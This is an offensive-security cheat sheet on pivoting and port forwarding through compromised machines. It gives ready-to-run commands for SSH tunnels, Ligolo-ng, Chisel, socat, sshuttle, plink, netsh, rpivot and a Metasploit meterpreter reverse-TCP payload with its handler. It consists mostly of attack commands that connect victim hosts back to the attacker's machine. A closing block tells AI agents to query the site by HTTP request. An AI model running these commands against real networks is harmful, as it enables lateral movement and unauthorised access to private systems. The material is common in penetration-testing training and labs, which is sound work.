# Pivoting / Forwarding

## 00. Basic

```bash
## ------------------| Check arp table
arp -an
```

* Port Forwarding to other machine to Kali VM's VPN

<pre class="language-bash"><code class="lang-bash">## ------------------| Method I (SSH Reverse Tunnel)
<strong>### Machine-A (192.168.1.130) – Source Machine
</strong>### Machine-B (192.168.10.3) – Relay Machine (Inside VM with VPN 10.10.xx.xxx)
### If you want to forward HTTP (port 80) traffic from Machine-A to Machine-B's VPN, use the following steps:
### Step 1: Establish an SSH Reverse Tunnel from Machine-A to Machine-B
### Run the following command on Machine-A:
ssh -R 8080:10.10.11.123:80 Machine-B
### Step 2: Redirect Traffic on Machine-B to Port 8080
### Once SSH is established, run the following command on Machine-B:
sudo iptables -t nat -A OUTPUT -p tcp --dport 80 -j REDIRECT --to-port 8080

## ------------------| Method III (iptables &#x26; NAT) - Requires Root Access on Both Machines
### Step 1: Enable IP Forwarding on Machine-B
### Run the following commands on Machine-B:
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
sudo iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 10.10.11.123:80
sudo iptables -A FORWARD -p tcp --dport 80 -j ACCEPT
### Step 2: Route Machine-A’s Traffic Through Machine-B
### Run the following command on Machine-A:
sudo ip route add 10.10.11.123 via 192.168.10.3

## ------------------| Method II (SOCKS Proxy)
### Using SOCKS Proxy for Full Traffic Redirection
### Step 1: Start a SOCKS Proxy on Machine-B
### Run the following command on Machine-B:
ssh -D 1080 Machine-A
### Step 2: Configure Machine-A to Use the Proxy
### Run the following commands on Machine-A:
export http_proxy="socks5h://127.0.0.1:1080"
export https_proxy="socks5h://127.0.0.1:1080"
</code></pre>

## 01. Port Forwarding

### 01.0 [Ligolo-ng](https://github.com/tnpitsecurity/ligolo-ng)

```bash
## ------------------| Agent [target/victim computer]
## Windows 
wget -q --show-progress $(wget -qO- https://api.github.com/repos/nicocha30/ligolo-ng/releases/latest | grep "browser_download_url" | grep "windows_amd64.zip" | grep agent | awk -F '"' '{print $4}') -O /tmp/agent-windows.zip
unzip -j /tmp/agent-windows.zip -d $PWD agent.exe
.\agent.exe -connect <MyIP>:11601 -ignore-cert
## Linux
wget -q --show-progress $(wget -qO- https://api.github.com/repos/nicocha30/ligolo-ng/releases/latest | grep "browser_download_url" | grep "linux_amd64.tar.gz" | grep agent | awk -F '"' '{print $4}') -O /tmp/agent-linux.tar.gz
tar -xvf /tmp/agent-linux.tar.gz -C $PWD agent
./agent -connect <MyIP>:11601 -ignore-cert

## ------------------| Server [My Computer]
sudo ip tuntap add user $USER mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert
session 
ifconfig 
sudo ip route add <IPRange>/24 dev ligolo ## Ex: 172.17.0.0/24 
start
## Scan live hosts
fping -a -g 172.17.0.0/24
```

### 01.1 SSH Port Forward

```bash
##  -N   Do not execute a remote command.  This is useful for just forwarding ports.
~C # do it as very first command

## ------------------| Local Port Forward
## Local Host <--> SSH Server <--> Remote Host
ssh -L <host_port>:<remote_ip>:<remote_port> <user>@<sshserverip>
autossh -L <host_port>:<remote_ip>:<remote_port> <user>@<sshserverip>
## ex: ssh -L 3306:127.0.0.1:3306 admin@sshserver.local

## 3306 is victim's machine port 
## 1337 is our machine port 
ssh> -L 1337:127.0.0.1:3306 
ssh -L 1337:127.0.0.1:3306 <user>@<machine_to_pivot>

## ------------------| Remote Port Forward
## Remote Host <--> SSH Server <--> Local Host
ssh -R <remote_port>:<remote_ip>:<host_port> <user>@<sshserverip>

## 3306 is victim's machine port 
## 1337 is our machine port 
ssh -R 1337:127.0.0.1:3306 <user>@<machine_to_pivot>

## ------------------| Dynamic Port Forward (Use of proxychain)
ssh> -D 1080
socks5 127.0.0.1 1080 

## Config proxychain
sudo vi /etc/proxychains.conf
socks5 127.0.0.1 1080
## 1337 is our machine port 
ssh -D 127.0.0.1:1080 <user>@<machine_to_pivot>
ssh -D 127.0.0.1:1080 -f -N <user>@<machine_to_pivot>
## Launch nmap
proxychains nmap -sT 172.16.1.0/24
```

### 01.2 [Socat](https://www.redhat.com/sysadmin/getting-started-socat) Multipurpose relay

```bash
## ------------------| Normal
socat TCP-LISTEN:4444,fork TCP:0.0.0.0:631
socat TCP-LISTEN:4444,fork,bind=10.10.14.26 TCP:127.0.0.1:3306

## ------------------| Send smb traffic from kali VM to windows VM
sudo socat TCP-LISTEN:445,fork,reuseaddr TCP:<WINDOWS_VM_IP>:445
```

### 01.3 Using [Chisel](https://github.com/jpillora/chisel/releases)

```bash
## ------------------| Normal
## Server side
./chisel server --reverse --port 1234 
## Client side
./chisel client 10.10.14.26:1234 R:3000:127.0.0.1:3000 R:3001:127.0.0.1:3001 

## ------------------| SOCKS5 (With Proxychains)
## Server side
chisel server --reverse --port 1234
## Client side
./chisel client 10.14.14.7:1234 R:0.0.0.0:1080:socks
## Edit /etc/proxychains.conf 
socks5   127.0.0.1   1080
## Use nmap with proxychains
```

### 01.4 Using [sshuttle](https://github.com/sshuttle/sshuttle)

```bash
## ------------------| For all routes
sudo sshuttle -vvr root@10.10.110.100 0/0
sudo sshuttle -vr root@10.10.110.100 0/0 --ssh-cmd "ssh -i ./id_rsa"
sudo sshuttle -vr root@10.10.110.100 0.0.0.0/0 --ssh-cmd "ssh -i ./id_rsa"
sudo sshuttle -vr root@10.10.110.100 0.0.0.0/24 --ssh-cmd "ssh -i ./id_rsa"

## ------------------| For specific route
sudo sshuttle -vr root@10.10.110.100 172.16.1.0/24 --ssh-cmd "ssh -i ./id_rsa"
```

### 01.5 Using ncat tunnel

```bash
## ------------------| Set ncat for target machine
ncat -vv --listen 1337 --proxy-type http

## ------------------| Edit on the attacker machine (10.10.110.100 is the IP of my ssh machine)
echo "http\t 10.10.110.100 \t1337" >> /etc/proxychains.conf
# To verify
tail -2 /etc/proxychains.conf

## ------------------| Then use proxychains
proxychains nmap -sT 172.16.1.0/24
```

### 01.6 Using [httptunnel](https://github.com/larsbrinkhoff/httptunnel)

```bash
## ------------------| On Server
hts --forward-port localhost:3306 1337

## ------------------| On Client
htc --forward-port 3306 <compromised_ip>:1337
```

### 01.7 Using Plink.exe

```bash
cp /usr/share/windows-resources/binaries/plink.exe .

.\plink.exe root@<OURIP> -R 445:127.0.0.1:455

cmd.exe /c echo y | plink.exe -ssh -l <USER> -pw <PASSWORD> -R <our_ip>:1337:127.0.01:3306 <our_ip>          
```

### 01.8 Using netsh.exe

```bash
## 3306 is victim's machine port 
## 1337 is compromised machine port 
netsh interface portproxy add v4tov4 listenport=1337 listenaddress=<compromised_ip> connectport=3306 connectaddress=<remote_ip>                  

## Add firewall rule
netsh advfirewall firewall add rule name="forward_port" protocol=TCP dir=in localip=<compromised_ip> localport=4545 action=allow
```

### 01.9 Using [rinetd](https://github.com/samhocevar/rinetd)

```bash
## ------------------| Forword my google.com traffic to resticted device
sudo vi /etc/rinetd.conf
### Jump to line number 19 and add following line
0.0.0.0    80    <GoogleIPAddress>    80
### Restart service
sudo service rinetd restart

### Success ? (on resticted machine)
nc -znv <AttackerIP> 80   
```

### 01.10 Using [rpivot.exe](https://github.com/klsecservices/rpivot) \[Best for Windows XP]

```bash
## ------------------| Start server on attacker machine
git clone https://github.com/klsecservices/rpivot.git && cd rpivot
python2 server.py --server-ip 0.0.0.0 --server-port 8989

## ------------------| Start rpivot on compromised machine
wget https://github.com/klsecservices/rpivot/releases/download/v1.0/client.exe
.\client.exe --server-ip <IP> --server-port 8989

## ------------------| Proxy
/etc/proxychains.conf
socks4	127.0.0.1	1080
proxychains nmap -sT -p 80 <IP>
```

### 01.11 Using Metasploit with Meterpreter

```bash
## ------------------| Create payload
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<MyIP> LPORT=7799 -f elf -o msf.bin    

## ------------------| Launch MSFConsole
msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lport 7799
set lhost 10.10.14.13
run -j
sessions -i

## ------------------| Methord 0x01
route add <Compromised_IP_Address/24> <meterpreter_session_id>
## --> ex : route add 172.17.0.0/24 1
use auxiliary/server/socks_proxy
set SRVPORT 1080 # edit this port on /etc/proxychains.conf (socks5)
run

## ------------------| Methord 0x02
## !! You must be on " meterpreter > " shell
portfwd add -l 8003 -p 3306 -r 172.17.0.2
    ## -l (8003) is listening us
    ## -p (3306) this port running on compromised machine
    ## -r (172.17.0.1) compromised ip address
    ## then you can use 127.0.0.1:8003 from your end
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.h4rithd.com/tools/pivoting-forwarding.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.